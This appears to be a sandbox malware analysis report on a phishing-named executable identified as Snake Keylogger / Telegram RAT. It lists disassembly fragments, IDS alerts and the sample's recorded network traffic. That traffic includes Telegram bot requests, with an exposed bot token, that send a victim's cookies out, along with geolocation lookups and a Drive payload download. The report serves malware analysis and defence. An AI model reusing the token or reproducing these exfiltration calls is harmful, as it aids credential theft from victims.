Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39063709h	6_2_39063460
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then mov esp, ebp	6_2_3906B081
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390632B1h	6_2_3906308D
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39066733h	6_2_39066488
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39060741h	6_2_39060498
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906E386h	6_2_3906E0B8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906C396h	6_2_3906C0C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39060B99h	6_2_390608F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390625A9h	6_2_39062300
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906D5D6h	6_2_3906D308
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390679C9h	6_2_39067720
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390655D1h	6_2_39065328
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39062A01h	6_2_39062758
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39065A29h	6_2_39065780
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906FA56h	6_2_3906F788
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906DA66h	6_2_3906D798
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906BA76h	6_2_3906B7A8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39062E59h	6_2_39062BB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39065E81h	6_2_39065BD8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39066CC1h	6_2_39066A18
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390648C9h	6_2_39064620
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39061CF9h	6_2_39061A50
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906F136h	6_2_3906EE68
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39067119h	6_2_39066E70
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906D146h	6_2_3906CE78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39064D21h	6_2_39064A78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39062151h	6_2_39061EA8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39067571h	6_2_390672C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39065179h	6_2_39064ED0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906F5C6h	6_2_3906F2F8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D6E38h	6_2_390D6B40
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D6970h	6_2_390D6678
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D6347h	6_2_390D5FD8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D4BD7h	6_2_390D4908
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D7300h	6_2_390D7008
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DE0F8h	6_2_390DDE00
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D2BE6h	6_2_390D2918
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DC910h	6_2_390DC618
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D19DEh	6_2_390D1710
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D9E08h	6_2_390D9B10
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D54F6h	6_2_390D5228
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D8620h	6_2_390D8328
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DF418h	6_2_390DF120
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D3506h	6_2_390D3238
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DDC30h	6_2_390DD938
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DB128h	6_2_390DAE30
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D5E16h	6_2_390D5B48
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D9940h	6_2_390D9648
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D030Eh	6_2_390D0040
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D3E26h	6_2_390D3B58
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DEF50h	6_2_390DEC58
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DC448h	6_2_390DC150
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DAC60h	6_2_390DA968
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D0C2Eh	6_2_390D0960
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D8158h	6_2_390D7E60
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D4746h	6_2_390D4478
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DD768h	6_2_390DD470
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D2756h	6_2_390D2488
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DBF80h	6_2_390DBC88
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D154Eh	6_2_390D1280
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D9478h	6_2_390D9180
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D5066h	6_2_390D4D98
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D7C90h	6_2_390D7998
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DEA88h	6_2_390DE790
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D3076h	6_2_390D2DA8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DD2A0h	6_2_390DCFA8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D1E47h	6_2_390D1BA0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DA798h	6_2_390DA4A0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D5986h	6_2_390D56B8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D8FB0h	6_2_390D8CB8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DFDA8h	6_2_390DFAB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D3996h	6_2_390D36C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DE5C0h	6_2_390DE2C8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DBAB8h	6_2_390DB7C0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DA2D0h	6_2_390D9FD8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D079Eh	6_2_390D04D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D77C8h	6_2_390D74D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D42B6h	6_2_390D3FE8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DF8E0h	6_2_390DF5E8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DCDD8h	6_2_390DCAE0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D22C6h	6_2_390D1FF8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390DB5F0h	6_2_390DB2F8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D10BEh	6_2_390D0DF0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390D8AE8h	6_2_390D87F0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39101FE8h	6_2_39101CF0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39100801h	6_2_39100508
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39101658h	6_2_39101360
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39100CC8h	6_2_391009D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39101B20h	6_2_39101828
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39100338h	6_2_39100040
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39101190h	6_2_39100E98
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_39264118
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_39260B32
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_39260BC0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_39260C78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_39260F8E
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_39264108
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_392640B9

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2019/02/2025%20/%2006:03:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendDocument?chat_id=8173633564&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd51106829459fHost: api.telegram.orgContent-Length: 1279

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49712 -> 142.250.185.206:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49726 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49730 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Swift Copy_18.02.2025.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Swift Copy_18.02.2025.exe